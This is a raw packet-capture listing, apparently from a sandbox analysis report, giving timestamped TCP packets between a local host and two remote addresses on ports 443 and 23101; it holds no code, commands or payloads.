                                                        Dec 17, 2024 14:30:38.217420101 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.217489958 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.223297119 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.223371983 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.229005098 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.229073048 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.229101896 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.234859943 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.234939098 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.237715006 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.237783909 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.243634939 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.243695021 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.249404907 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.249468088 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.252373934 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.252443075 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.256747007 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.256820917 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.262479067 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.262538910 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.268398046 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.268455982 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.274424076 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.274481058 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.277111053 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.277178049 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.282823086 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.282896996 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.288520098 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.288583994 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.291481972 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.291547060 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.304063082 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.304126978 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.376082897 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.376163960 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.380511045 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.380589962 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.382823944 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.382886887 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.387620926 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.387701988 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.397937059 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.397969007 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.398019075 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.398039103 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.398077965 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.398133993 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.410046101 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.410068989 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.410115004 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.410137892 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.410173893 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.423197985 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.423219919 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.423271894 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.423290014 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.423341990 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.433041096 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.433060884 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.433140993 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.433157921 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.440018892 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.440038919 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.440088987 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.440115929 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.440140963 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.447668076 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.447689056 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.447734118 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.447757006 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.447781086 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.454179049 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.454200983 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.454247952 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.454262972 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.454288960 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.574371099 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.574394941 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.574460983 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.574495077 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.574520111 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.581650019 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.581660032 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.581679106 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.581688881 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.581722021 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.581737041 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.581763029 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.588421106 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.588464022 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.588480949 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.588494062 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.588495970 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.588520050 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.588546038 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.588546038 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.595149040 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.595170021 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.595204115 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.595216036 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.595254898 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.595283985 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.602474928 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.602494955 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.602560997 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.602598906 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.602631092 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.607562065 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.607579947 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.607665062 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.607682943 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.615164995 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.615187883 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.615232944 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.615266085 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.615298986 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.622299910 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.622323036 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.622368097 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.622400999 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.622426987 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.682794094 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.795355082 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.795367956 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.795419931 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.795439959 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.795463085 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.795504093 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.795504093 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.795551062 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.795680046 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.802665949 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.802686930 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.802733898 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.802762985 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.802784920 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.802851915 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.809683084 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.809701920 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.809767008 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.809782028 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.809833050 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.816087008 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.816114902 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.816155910 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.816169024 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.816219091 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.816219091 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.823112965 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.823147058 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.823189020 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.823206902 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.823230028 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.823260069 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:30:38.829399109 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.829420090 CET44349784104.21.84.67192.168.2.6
                                                        Dec 17, 2024 14:30:38.829467058 CET49784443192.168.2.6104.21.84.67
                                                        Dec 17, 2024 14:31:00.144319057 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.277121067 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:00.397099018 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.699238062 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.759638071 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:00.760669947 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:00.880068064 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880100012 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880112886 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880140066 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880209923 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880258083 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880374908 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880469084 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880606890 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880635023 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880808115 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880834103 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880866051 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.880943060 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.881033897 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.881308079 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.881340027 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.881473064 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.881499052 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.881642103 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:00.881721973 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:01.448038101 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:01.570338011 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:01.862133980 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:01.898933887 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:01.900033951 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:02.019926071 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.019947052 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.019973040 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.019984961 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020077944 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020090103 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020307064 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020373106 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020482063 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020493984 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020546913 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020559072 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020643950 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020654917 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020813942 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.020894051 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.021049023 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.021069050 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.021084070 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.021157026 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.021219969 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.464397907 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:02.584414005 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.876637936 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:02.930161953 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:02.931154013 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:03.050466061 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050482988 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050488949 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050493956 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050506115 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050512075 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050517082 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050724030 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050774097 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050786972 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050797939 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050812960 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050869942 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.050920963 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.051187038 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.051230907 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.051244020 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.051496983 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.051510096 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.051549911 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.051562071 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.497901917 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:03.618271112 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.910026073 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:03.959965944 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:03.961024046 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:04.080085993 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080118895 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080152035 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080202103 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080234051 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080286026 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080317020 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080425978 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080455065 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080507994 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080534935 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080562115 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080589056 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080621958 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080812931 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080909014 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.080987930 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.081039906 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.081157923 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.081186056 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.081218958 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.511290073 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:04.631324053 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.923504114 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:04.961987019 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:04.963093996 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:05.082108021 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082120895 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082138062 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082145929 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082216024 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082223892 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082283020 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082292080 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082329035 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082427025 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082434893 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082549095 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082556963 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.082560062 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083154917 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083163977 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083264112 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083271980 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083360910 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083569050 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.083576918 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:05.527578115 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:05.647386074 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:06.543275118 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:06.863571882 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:07.558754921 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:07.679094076 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.379667044 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.421876907 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.422920942 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.541908026 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.541969061 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542026043 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542120934 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542155027 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542258978 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542293072 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542449951 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542493105 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542525053 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542573929 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542709112 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542737961 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542768955 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.542939901 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543026924 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543054104 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543231010 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543258905 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543308973 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.543353081 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.571675062 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.573874950 CET4982923101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.627450943 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.628464937 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.664243937 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.665337086 CET4983023101192.168.2.645.80.158.30
                                                        Dec 17, 2024 14:31:08.694024086 CET231014982945.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.747642994 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.747742891 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.747901917 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748020887 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748167038 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748428106 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748478889 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748749018 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.748946905 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.749061108 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785612106 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785664082 CET231014983045.80.158.30192.168.2.6
                                                        Dec 17, 2024 14:31:08.785751104 CET231014983045.80.158.30192.168.2.6
